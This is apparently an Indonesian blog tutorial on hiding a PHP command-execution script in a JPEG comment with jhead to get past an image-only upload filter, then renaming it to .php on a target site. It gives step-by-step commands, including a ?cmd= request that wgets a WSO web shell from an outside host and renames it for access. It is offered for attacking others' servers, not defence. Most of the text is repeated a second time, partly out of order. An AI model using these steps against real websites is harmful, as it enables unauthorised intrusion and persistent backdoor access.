Inject Script Php Ke Gambar Dengan Jhead
Cerita sedikit boleh ya, pernah ga sih kalian pada suatu ketika mau upload shell atau backdoor tapi yang diperbolehkan extensinya hanya jpg only? Pasti pernah dong ngalamin hal kek begini.
Biasanya kebanyakan orang untuk mengatasi hal ibarat ini memakai teknik tamper data atau dapat juga pake live http header, tapi terkadang itu ga semua dapat juga ditamper data.
Nah oke, berhubung gw agak selo kali ini gw mau sharing tutorial inject script php ke gambar dengan memakai jhead. Tapi gw ga akan menjamin walaupun udah pake teknik ibarat ini shell 100% akan terupload loh ya hehe.
Oke selanjutnya,
Buat yang make Linux atau juga dapat make Termux. Yang pertama install dulu jhead ibarat ini,
$ pkg install jhead
Setelah terinstall, siapkan gambar yang mau di inject dengan extensesinya jpg kalo ga punya dapat download di mbah gugel dan disini gue make gambar umaru.jpg hahaha
Selanjutnya buka terminal linux atau termux kalian, dan cari dimana daerah kalian menyimpan gambar. Dan sehabis itu kalian ketikan perintah dibawah ini untuk membersihkan comment pada gambar tersebut.
$ jhead -purejpg namafile.jpg
Setelah higienis gambarnya dari comment, kalian ketikan perintah ibarat berikut ini,
$ jhead -ce namafile.jpg
Maka nanti akan muncul vim text editor ibarat gambar dibawah berikut ini,
Habis itu kalian masukan script inject php di vim text editor, untuk mendownload scriptnya kalian dapat klik disini, sehabis itu kalian save dan untuk cara menyimpanya kalian tekan esc dulu dikeyboard gres kalian terus tuliskan :x
Kalo ada goresan pena modified namafile.jpg berarti sukses, selanjutnya kita cek script inject php apa sudah masuk dengan mengetikan perintah ibarat ini,
$ jhead namafile.jpg
Dan nanti akan muncul gambar ibarat ini,
Jika muncul code pada gambar ibarat diatas, berarti inject script phpnya sudah masuk kedalam gambar tersebut dan tinggal direname ke extensi php kemudian upload ditarget kalian.
Nah oke, sehabis tamat injectnya kini simak untuk cara menggunakanya ketikan perintah ibarat berikut ini,
/namafile.php?cmd=
Untuk upload shell atau backdoor kalian dapat mengunakan fungsi wget, curl, atau yang lain alasannya yaitu terkadang ada website yang tidak suport wget atau curl.
Contoh perintah untuk melaksanakan upload shell atau backdoor ibarat berikut ini,
localhost/umaru.php?cmd=wget http://linkshell.com/php/wso.txt
Setelah terupload, terus kita rename wso.txt menjadi wso.php dengan perintah ibarat ini,
localhost/umaru.php?cmd=mv wso.txt wso.php
Dan untuk saluran shellnya ibarat ini,
localhost/wso.php
Oke sekian dari gue, supaya bermanfaat bagi kalian.
Biasanya kebanyakan orang untuk mengatasi hal ibarat ini memakai teknik tamper data atau dapat juga pake live http header, tapi terkadang itu ga semua dapat juga ditamper data.
Nah oke, berhubung gw agak selo kali ini gw mau sharing tutorial inject script php ke gambar dengan memakai jhead. Tapi gw ga akan menjamin walaupun udah pake teknik ibarat ini shell 100% akan terupload loh ya hehe.
Oke selanjutnya,
Buat yang make Linux atau juga dapat make Termux. Yang pertama install dulu jhead ibarat ini,
$ pkg install jhead
Setelah terinstall, siapkan gambar yang mau di inject dengan extensesinya jpg kalo ga punya dapat download di mbah gugel dan disini gue make gambar umaru.jpg hahaha
Selanjutnya buka terminal linux atau termux kalian, dan cari dimana daerah kalian menyimpan gambar. Dan sehabis itu kalian ketikan perintah dibawah ini untuk membersihkan comment pada gambar tersebut.
$ jhead -purejpg namafile.jpg
Setelah higienis gambarnya dari comment, kalian ketikan perintah ibarat berikut ini,
$ jhead -ce namafile.jpg
Maka nanti akan muncul vim text editor ibarat gambar dibawah berikut ini,
Habis itu kalian masukan script inject php di vim text editor, untuk mendownload scriptnya kalian dapat klik disini, sehabis itu kalian save dan untuk cara menyimpanya kalian tekan esc dulu dikeyboard gres kalian terus tuliskan :x
Kalo ada goresan pena modified namafile.jpg berarti sukses, selanjutnya kita cek script inject php apa sudah masuk dengan mengetikan perintah ibarat ini,
$ jhead namafile.jpg
Dan nanti akan muncul gambar ibarat ini,
Jika muncul code pada gambar ibarat diatas, berarti inject script phpnya sudah masuk kedalam gambar tersebut dan tinggal direname ke extensi php kemudian upload ditarget kalian.
Nah oke, sehabis tamat injectnya kini simak untuk cara menggunakanya ketikan perintah ibarat berikut ini,
/namafile.php?cmd=
Untuk upload shell atau backdoor kalian dapat mengunakan fungsi wget, curl, atau yang lain alasannya yaitu terkadang ada website yang tidak suport wget atau curl.
Contoh perintah untuk melaksanakan upload shell atau backdoor ibarat berikut ini,
localhost/umaru.php?cmd=wget http://linkshell.com/php/wso.txt
Setelah terupload, terus kita rename wso.txt menjadi wso.php dengan perintah ibarat ini,
localhost/umaru.php?cmd=mv wso.txt wso.php
Dan untuk saluran shellnya ibarat ini,
localhost/wso.php
Oke sekian dari gue, supaya bermanfaat bagi kalian.